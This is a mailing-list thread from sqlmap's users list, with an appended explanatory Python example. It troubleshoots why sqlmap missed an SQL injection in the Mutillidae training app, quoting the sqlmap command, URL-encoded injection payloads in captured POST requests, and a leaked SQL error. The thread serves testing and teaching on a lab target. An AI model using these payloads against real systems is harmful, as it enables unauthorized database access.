Re: [sqlmap-users] "parameter is not dynamic" / "all parameters are not injectable" error
From: Miroslav S. <mir...@gm...> - 2010-10-05 15:07:46
this was fun to test :) you've used info: user_name=test&password=1234 while you haven't made that account in Mutillidae (that link Register on Login page).

problem goes like this. sqlmap tests some sql expression for being TRUE when testing one of sql injection vectors (like that: "testing unescaped numeric injection on POST parameter 'password'"), while it also has a double check vector which is of the same kind but it must return FALSE. while sqlmap is AND based, and in your case both checks for all vectors returned FALSE ("Bad user name or password!"), sqlmap is not able to properly detect sql injection existence.

this could be a good test case for implementing OR based sql injection support too, for cases like this one.

kind regards.

On Tue, Oct 5, 2010 at 3:45 PM, ts2112 <ts...@go...> wrote:
> Hi!
>
> I used the publicly available mutillidae test application to test sqlmap.
> Whatever I do I get the response "all parameters are not injectable"
> although this is definitely not the case, as a burp trace shows. Example:
>
> ===== Command:
>
> $ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php"
> --data="user_name=test&password=1234&Submit_button=Submit" --method=POST -v 0 --tables --flush-session -p password
> --proxy "http://localhost:15000"
>
> ===== Result 0.9 (similar with 0.8):
>>>>>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 15:26:01
>
> [15:26:05] [CRITICAL] all parameters are not injectable
>
> [*] shutting down at: 15:26:05
> <<<<
>
> ===== Among the 38 requests that burp shows are these 2
>>>>>
> 1. Request
> --------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <headers>
> user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_button=Submit
>
> 1. Response (no SQL-Injection evidence)
> --------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 5091
> Connection: close
> Content-Type: text/html
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
> <html>
> <head>
> <meta content="text/html; charset=us-ascii" http-equiv="content-type">
> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
> </head>
> <body>
> <table border="0" width="100%" cellspacing="0" cellpadding="0">
> <tr><td bgcolor="#88ff88"align="center" colspan="2">
> <table width="100%">
> <td valign="top"><a href="index.php"><img border="0" align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
> <td align="center" valign="top"><h1><b>Mutillidae: Hack, Learn, Secure, Have Fun!!!</b></h1>
> <font color="#ff0000">Not logged in</font>
> ...
>
> 2. Request
> ------------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <Headers>
> user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr&Submit_button=Submit
>
> 2. Response (evidence of SQL-Injection)
> ------------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28 mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 359
> Connection: close
> Content-Type: text/html
>
> Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL Error:</b>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
> <<<<
>
> To my understanding, by the difference of those responses and the pattern in the second, sqlmap should recognize that there *is* an SQL Injection.
>
> Thank you!
>
> Thomas

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
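To make the mechanism described in the reply above concrete, here is an added Python example (not code from sqlmap, Mutillidae or the thread): it models the quoted login statement against an in-memory SQLite table and runs a simplified AND-based TRUE/FALSE probe against it, beside a parameterized version of the same query. The account table, the probe strings and the function names are constructed for the example.

```python
import sqlite3


def vulnerable_login(conn, user_name, password):
    # Stand-in for the quoted Mutillidae statement: values concatenated into SQL.
    sql = ("SELECT * FROM accounts WHERE username='%s' AND password='%s'"
           % (user_name, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as e:
        return "SQL Error: %s" % e  # error page, as in the second response
    return "Logged in" if row else "Bad user name or password!"


def hardened_login(conn, user_name, password):
    # Same query with bound parameters: input can never change the SQL structure.
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    row = conn.execute(sql, (user_name, password)).fetchone()
    return "Logged in" if row else "Bad user name or password!"


def and_based_check(login, conn, user_name, password):
    """Simplified AND-based boolean probe in the spirit of sqlmap's test:
    one appended condition that keeps the WHERE clause TRUE and a double
    check that forces it FALSE. Only a differing pair of responses counts
    as evidence; an already-FALSE baseline makes both responses identical."""
    true_resp = login(conn, user_name, password + "' AND 'a'='a")
    false_resp = login(conn, user_name, password + "' AND 'a'='b")
    return true_resp != false_resp


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("INSERT INTO accounts VALUES ('admin', 'adminpass')")  # constructed row
    return conn


if __name__ == "__main__":
    conn = setup()
    # unregistered account (the thread's case): baseline is already FALSE
    print(and_based_check(vulnerable_login, conn, "test", "1234"))        # False
    # registered account: TRUE and FALSE probes produce different pages
    print(and_based_check(vulnerable_login, conn, "admin", "adminpass"))  # True
    # parameterized query: the probes never alter the statement
    print(and_based_check(hardened_login, conn, "admin", "adminpass"))    # False
```

The unbalanced-parenthesis value from the second request produces an SQL error page from the concatenated query but a plain login failure from the parameterized one, which is the difference the original poster spotted in the burp trace.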